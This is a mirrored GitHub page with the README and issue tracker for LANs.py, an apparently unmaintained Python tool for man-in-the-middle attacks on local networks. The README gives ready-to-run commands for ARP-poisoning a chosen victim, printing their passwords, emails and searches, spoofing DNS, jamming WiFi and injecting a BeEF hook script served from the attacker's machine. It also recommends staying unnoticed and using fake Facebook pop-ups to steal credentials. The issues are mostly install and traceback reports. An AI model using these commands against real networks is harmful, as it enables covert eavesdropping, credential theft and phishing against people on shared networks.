Giter Site home page Giter Site logo

lans.py's Introduction

LANs.py

*** NOTE *** I do not maintain this anymore. I highly suggest using bettercap instead for ARP and MITM needs.

  • Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit.

    • Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.
  • Also can be used to continuosly jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine tuned to allow jamming of everyone or even just one client. (Cannot jam WiFi and spy simultaneously)

Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, and a wireless card capable of promiscuous mode if you choose not to use the -ip option

Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.

All options:

Python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
                [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
                [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
                [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL]
                [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS]
                [--directedonly] [--accesspoint ACCESSPOINT]

#Usage

Common usage:

python LANs.py -u -p

Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof.

Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received. Screenshot: http://i.imgur.com/kQofTYP.png

Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.

Another common usage:

python LANs.py -u -p -d -ip 192.168.0.10

-d: open an xterm with driftnet to see all images they view

-ip: target this IP address and skip the active targeting at the beginning

HTML injection:

python LANs.py -b http://192.168.0.5:3000/hook.js

Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in <script> tags so you can really enter any location of a javascript file. Attempts to insert it after the first tag found in the page's HTML.

python LANs.py -c '<title>Owned.</title>'

Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first <head> tag and failing that, injects prior to the first </head> tag. This example will change the page title to 'Owned.'

Read from pcap:

python LANs.py -pcap libpcapfilename -ip 192.168.0.10

To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script.

DNS spoofing

python LANs.py -a -r 80.87.128.67
python LANs.py -dns eff.org

Example 1: The -a option will spoof every single DNS request the victim makes and when used in conjuction with -r it will redirect them to -r's argument address. The victim will be redirected to stallman.org (80.87.128.67) no matter what they type in the address bar.

Example 2: This will spoof the domain eff.org and subdomains of eff.org. When there is no -r argument present with the -a or -dns arguments the script will default to sending the victim to the attacker's IP address. If the victim tries to go to eff.org they will be redirected to the attacker's IP.

Most aggressive usage:

python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10

Jam all WiFi networks:

python LANs.py

All options:


Normal Usage:

  • -b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js

  • -c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject

  • -d: open an xterm with driftnet to see all images they view

  • -dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com

  • -a: Spoof every DNS response the victim makes, effectively creating a captive portal page; -r option can be used with this

  • -r IPADDRESS: only to be used with the -dns DOMAIN option; redirect the user to this IPADDRESS when they visit DOMAIN

  • -u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting

  • -i INTERFACE: specify interface; default is first interface in ip route, eg: -i wlan0

  • -ip: target this IP address

  • -n: performs a quick nmap scan of the target

  • -na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt

  • -p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received

  • -pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument

  • -rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it

  • -rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it

  • -v: show verbose URLs which do not truncate at 150 characters like -u

Wifi Jamming:

  • -s MAC_Address_to_skip: Specify a MAC address to skip deauthing. Example: -s 00:11:BB:33:44:AA
  • -ch CHANNEL: Limit wifijammer to single channel
  • -m MAXIMUM: Maximum number of clients to deauth. Use if moving around so as to prevent deauthing client/AP pairs outside of current range.
  • -no: Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n
  • -t TIME_INTERVAL: Time between each deauth packet. Default is maximum. If you see scapy errors like 'no buffer space' try: -t .00001
  • --packets NUMBER: Number of packets to send in each deauth burst. Default is 1 packet.
  • --directedonly: Don't send deauth packets to the broadcast address of APs and only send to client/AP pairs
  • --accesspoint ROUTER_MAC: Enter the MAC address of a specific AP to target.

Clean up

Upon receiving a Ctrl-C:

-Turns off IP forwarding

-Flushes iptables firewall

-Individually restores the router and victim's ARP tables

Technical details

This script uses a python nfqueue-bindings queue wrapped in a Twisted IReadDescriptor to feed packets to callback functions. nfqueue-bindings is used to drop and forward certain packets. Python's scapy library does the work to parse and inject packets.

Injecting code undetected is a dicey game, if a minor thing goes wrong or the server the victim is requesting data from performs things in unique or rare way then the user won't be able to open the page they're trying to view and they'll know something's up. This script is designed to forward packets if anything fails so during usage you may see lots of "[!] Injected packet for www.domain.com" but only see one or two domains on the BEeF panel that the browser is hooked on. This is OK. If they don't get hooked on the first page just wait for them to browse a few other pages. The goal is to be unnoticeable. My favorite BEeF tools are in Commands > Social Engineering. Do things like create an official looking Facebook pop up saying the user's authentication expired and to re-enter their credentials.


lans.py's People

Contributors

cbartlett avatar danmcinerney avatar ddworken avatar ganye avatar gkbrk avatar mattburesh avatar rroy1590 avatar swex avatar warna720 avatar xarses avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

lans.py's Issues

license

Lovely work. Please provide a license so others may understand any copying conditions. Leaving the work with out an otherwise declared license makes it all rights reserved.

Hah, just re-read the source, you did define license as 'GPL'. There are may versions of GPL. Please create a LICENSE with whichever version you intend to use or Note this in your readme.

Thanks.

Wrong LAN subnet

The initial scan of the network to identify hosts uses 192.168.211.0/24, and my network is 10.0.0.1/24.

What this error?

Traceback (most recent call last): File "LANs.py", line 1597, in <module> LANsMain(args) File "LANs.py", line 302, in LANsMain Spoof().poison(routerIP, victimIP, routerMAC, victimMAC) File "LANs.py", line 313, in poison send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC)) File "/usr/lib/python2.7/dist-packages/scapy/base_classes.py", line 223, in __call__ i.__init__(*args, **kargs) File "/usr/lib/python2.7/dist-packages/scapy/packet.py", line 99, in __init__ self.fields[f] = self.get_field(f).any2i(self, v) File "/usr/lib/python2.7/dist-packages/scapy/fields.py", line 249, in any2i return self.h2i(pkt,x) File "/usr/lib/python2.7/dist-packages/scapy/fields.py", line 230, in h2i x = Net(x) File "/usr/lib/python2.7/dist-packages/scapy/base_classes.py", line 77, in __init__ self.parsed,self.netmask = self._parse_net(net) File "/usr/lib/python2.7/dist-packages/scapy/base_classes.py", line 71, in _parse_net tmp[0]=socket.gethostbyname(tmp[0]) socket.gaierror: [Errno -3] Temporary failure in name resolution

OSError: [Errno 100] Network is down

I tried to reboot my network service and tried again.
I think something is wrong with scapy module itself.
I did upgrade the scapy and current scapy version is 2.4.0
here's the error I got on python LANs.py -u -p
root@vandan:/home/vandan/Downloads/oscp/Lanpy_spyLANUsers/LANs.py# python LANs.py -u -p
[] Running ARP scan to identify users on the network; this may take a minute - [nmap -sn -n 192.168.2.0/24]
[
] Running nbtscan to get Windows netbios names - [nbtscan 192.168.2.0/24]
[*] Enabling monitor mode [airmon-ng start wlp9s0]
Traceback (most recent call last):
File "LANs.py", line 1597, in
LANsMain(args)
File "LANs.py", line 182, in LANsMain
au.users(IPprefix, routerIP)
File "LANs.py", line 1080, in users
sniff(iface=self.monmode, prn=self.pkt_cb, store=0)
File "/usr/local/lib/python2.7/dist-packages/scapy/sendrecv.py", line 731, in sniff
*arg, **karg)] = iface
File "/usr/local/lib/python2.7/dist-packages/scapy/arch/linux.py", line 591, in init
_flush_fd(self.ins)
File "/usr/local/lib/python2.7/dist-packages/scapy/arch/linux.py", line 395, in _flush_fd
os.read(fd,MTU)
OSError: [Errno 100] Network is down

Parallel for mac issue

I installed kite with all the dependencies on Parallel , but when i run python LANs.py i receive the following message:

Enabling monitor mode failed , do you have aircrack-ng installed ?

I m sure that aircrack-ng is installed .

where is aircrack-ng => /usr/sbin/aircrack-ng

Create requirements.txt

I think it would be of great value specially when someone like me want to get started as quickly as possible. The way it stands right now I have to figure-out and install dependencies by looking at imports.

Updated to Ubuntu 15.04 having some issues

[] Running ARP scan to identify users on the network; this may take a minute - [nmap -sn -n 192.168.1.0/24]
[
] Running nbtscan to get Windows netbios names - [nbtscan 192.168.1.0/24]
[*] Enabling monitor mode [airmon-ng start wlan0]
Traceback (most recent call last):
File "LANs.py", line 1603, in
LANsMain(args)
File "LANs.py", line 186, in LANsMain
au.users(IPprefix, routerIP)
File "LANs.py", line 1092, in users
sniff(iface=self.monmode, prn=self.pkt_cb, store=0)
File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 577, in sniff
p = s.recv(MTU)
File "/usr/lib/python2.7/dist-packages/scapy/arch/linux.py", line 485, in recv
pkt, sa_ll = self.ins.recvfrom(x)
socket.error: [Errno 100] Network is down

issue with installing lans due to dependency python2-nfqueue

We are trying to build the lans package and everything works fine except for issues with nfqueue. We have installed the nfqueue python2 package and installed _nfqueue.so and nfqueue.py under /usr/ib/python2.7/site-packages, but when we try to load nfqueue we get an error:

Traceback (most recent call last):
File "/usr/bin/lans", line 36, in
import nfqueue
File "/usr/lib/python2.7/site-packages/nfqueue.py", line 28, in
_nfqueue = swig_import_helper()
File "/usr/lib/python2.7/site-packages/nfqueue.py", line 24, in swig_import_helper
_mod = imp.load_module('_nfqueue', fp, pathname, description)
ImportError: dynamic module does not define init function (init_nfqueue)

Do you have any idea why we are getting this traceback

Nov 11 17:33 /usr/lib/python2.7/site-packages/nfqueue.py
Nov 11 17:33 /usr/lib/python2.7/site-packages/_nfqueue.so

Enabled IP forwarding

Hey, thanks for your great tool.

But I have a problem and I don't know how to fix it.

[*] Enabled IP forwarding
iptables: No chain/target/match by that name.
iptables: No chain/target/match by that name.
iptables: No chain/target/match by that name.
iptables: No chain/target/match by that name.
iptables: No chain/target/match by that name.

Iptables and everything else is working correct but I'm not able to use your tool.

Thanks for the help

IPprefix referenced before assignment

python LANs.py -u -n results in the following error on line 987 in main:

UnboundLocalError: local variable 'IPprefix' referenced before assignment

Requirements

python-requests may be needed on certain Linux Machines, Arch-Linux.

Support for alternate aircrack locations

I just recently compiled airmon, and it installed binaries to /usr/local/sbin, instead of /usr/sbin, which this script expects.

Perhaps the script should check alternate locations (such as the user's path, or common locations of the binaries) before saying it can't find the binary? This seems like good practice when using external programs.

Aircrack-ng

Hey, I can use aircrack-ng as a command, but when I try to run LANS, it gives me an error saying "Enabling monitor mode failed, do you have aircrack-ng installed?" The answer seems obvious. "Install aircrack-ng!" But, I already have it downloaded.

[Errno 19] No such device

Keep getting this error...
Traceback (most recent call last):
File "LANs.py", line 1220, in
LANsMain(args)
File "LANs.py", line 176, in LANsMain
au.users(IPprefix, routerIP)
File "LANs.py", line 1086, in users
sniff(iface=self.monmode, prn=self.pkt_cb, store=0)
File "/usr/local/lib/python2.7/dist-packages/scapy/sendrecv.py", line 593, in sniff
**karg)]
File "/usr/local/lib/python2.7/dist-packages/scapy/arch/linux.py", line 488, in init
self.ins.bind((iface, type))
File "/usr/lib/python2.7/socket.py", line 224, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 19] No such device

Refactor LANs.py

Refactor LANs.py with creds.py credential harvesting engine. Maybe add support for VM's too in process.

Feature Request: Attack the Entire Network

LANs.py works wonderfully and I've only had a couple issues that were pretty easy to fix. One thing I think would that would be a great improvement though, the option to poison the entire network vs just attacking one client.

The script is crashing

Hello,

I am trying to run the script in the first phase and it is crashing. Please see the screenshot. Any help?

image

Update readme to new line number

In the readme, it tells ubuntu users to modify line 135, where it should say "153". I imagine this number will continue to change with code additions.

Ctrl+C Breaks Programm

[*] Hit Ctrl-C at any time to stop and choose a victim IP
^CTraceback (most recent call last):
File "./LANs.py", line 1128, in
main(parse_args())
File "./LANs.py", line 992, in main
au.users(IPprefix, routerIP)
File "./LANs.py", line 867, in users
sniff(iface=self.monmode, prn=self.pkt_cb, store=0)
File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 596, in sniff
s.close()
KeyboardInterrupt

any idea?

distribution request

I am a developer for blackarch.org, we are building a archlinux repository that includes packages specifically geared towards pentesting. We would like to use your package in our repository, https://github.com/BlackArch/blackarch. Great job on the package by the way it will be quite useful.

How to run this in windows?

i am getting error like this

import nfqueue import error nfqueue

I tried easy_install nfqueue and easy_install python-nfqueue. But not working

UnboundLocalError: local variable 'nmap' referenced before assignment

I install all dependency, and when I try to run the program I get a following error:

[*] Running ARP scan to identify users on the network; this may take a minute...
[-] Nmap ARP scan failed, is it nmap installed?
Traceback (most recent call last):
  File "LANs.py", line 1061, in <module>
    main()
  File "LANs.py", line 936, in main
    au.users(IPprefix, routerIP)
  File "LANs.py", line 750, in users
    for x in nmap:
UnboundLocalError: local variable 'nmap' referenced before assignment

Beef Hook

Hello !

I've been trying for 3 days to get LANs.py inject beef's hook successfully but I couldn't manage to do it. Jamming and redirecting works but I just couldn't inject the script.

I tried -b [hook url], -c, and even tried -r to the demo page but it just wouldn't work.

Cannot use eth0 as interface

I've installed all the requirements for LANs.py on my Raspberry Pi but since I'm useing Ethernet, I cannot use this script. I've specified "-i eth0" but it still won't work.

Is it possible to have Ethernet support?

Thanks

Unable to scan using wireless device

root@kali:~/intercept# python LANs.py -i wlan0
[*] Running ARP scan to identify users on the network; this may take a minute - [nmap -sn -n 192.168.232.0/24]
[-] Router MAC not found. Exiting.

This is what I am getting when attempting to run LANs.py - for some reason it want to use the eth0 ip instead of the wlan/mon interface.

I am running this in a vm using the latest build of Kali

Rab.

cannot concatenate 'str' and 'NoneType' objects

Running: ./LANs.py -i wlan1 -c '<title>OWNED</title>' -ip 192.168.0.19

And I'm getting:

[] Enabled IP forwarding
[
] Flushed firewall and forwarded traffic to the queue; waiting for data

callback failure !
Traceback (most recent call last):
File "./LANs.py", line 169, in start
self.injecthtml(load, ack, pkt, payload, dport, sport)
File "./LANs.py", line 217, in injecthtml
self.user_agent = "'"+self.get_user_agent(header_lines)+"'"
TypeError: cannot concatenate 'str' and 'NoneType' objects

Do you know what could be a reason?

KALI 2.0 Error

Hello.
Thank you for this program but I cannot see this is working.

After I set the Victims IP address I see this error.

*] Hit Ctrl-C at any time to stop and choose a victim IP ^C [*] Turning off monitor mode [*] Enter the non-router IP to spoof: 192.168.1.3 [*] Checking the DHCP and DNS server addresses... Traceback (most recent call last): File "LANs.py", line 1220, in <module> LANsMain(args) File "LANs.py", line 198, in LANsMain ans, unans = srp(dhcp, timeout=5, retry=1) File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 357, in srp s = conf.L2socket(iface=iface, filter=filter, nofilter=nofilter, type=type) File "/usr/lib/python2.7/dist-packages/scapy/arch/linux.py", line 417, in __init__ self.ins.bind((iface, type)) File "/usr/lib/python2.7/socket.py", line 224, in meth return getattr(self._sock,name)(*args) socket.error: [Errno 19] No such device
I install the metasploit framework pro from rapid7 but its still doesnt work.

Is there any way to pass this error.

signal_handler : open('/proc/sys/net/ipv4/ip_forward', 'w').write('0\n')

IMHO in def signal_handler there shouldn't be this one: open('/proc/sys/net/ipv4/ip_forward', 'w').write('0\n')
Because somebody could have it turned on before and don't want to loose it.

I think it would be better to set here the value which ip_forward had before lunching LANs.py, not hardcoded "zero"โ€ฆ

:)

LANs.py not working in kali 1.0.8

I have to fix this script. I'm not sure what all is wrong, but somehow a few things are no longer working. Will fix when I get the time.

Airmon-ng update

airmon-ng being run takes down wlan0 to being up wlan0mon, this means that the lan connection is dropped.

there's talk of documenting a flag to restore the old functionality however I cant find any record of where this option is.

Lan.py ought to run with this flag enabled.

IPprefix stores empty value

output of /sbin/ip route:
ipr = ["'default", 'via', '192.168.1.1', 'dev', 'wlan2', '\n192.168.1.0/24', 'dev', 'wlan2', '', 'proto', 'kernel', '', 'scope', 'link', '', 'src', '192.168.1.5', "\n'"]

which you then IPprefix = ipr[8][2:]

resulting in nothing. Not sure what you are expecting here - an IP of router?

I saw an earlier issue that you fixed that tweaked this - may need to tweak a little more.

Compilation & execution on OSX 10.9 + MacPorts

I know it's stated clearly that you've intended for this to only work on Linux, but will you be extending this for the OSX platform at some point in the future?

Of all the prerequisites listed in your README file, I've not been able to find an equivalent for python nfqueue. May I know if you might know what can be used on OSX in place of this?

Much appreciated.

Call Back Failure

When the non-router IP is entered,the output is :

TypeError: start() takes exactly 2 arguments (3 given)

Enabling monitor mode failed (Kali linux 2.0)

I had downloaded this script and when tried to run script (as root on fresh installed Kali linux 2.0), it gave me this error:

[-] Enabling monitor mode failed, do you have aircrack-ng installed?

(screenshot: http://imgur.com/BVwWQie)

My wifi card supports monitor mode (Tp-link tl-wn722n) and when I run:

airmon-ng check kill
airmon-ng start wlan0
...

everything works properly. Can you please tell me how to fix this?

Improve URLSpy filtering

Any URL containing the string ".jpg" will not be displayed when URLSpy is enabled. E.g. www.jpg.daviddworken.com will not be listed. This is an edge case, but should still be addressed.

  • Rather than checking if URL contains ".jpg", instead:
    • Strip URL of all arguments.
    • Check if URL ends with ".jpg"

Filter out ad URLs.

  • Generate a list of ad websites/domains.
  • Filter URLs to check if they are on any of those domains.

[Feature request] output to file

Would it be possible to make LANs.py able to output the websites visited, emails, credentials, etc to a file? I would think that would make analyzing captured data easier.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.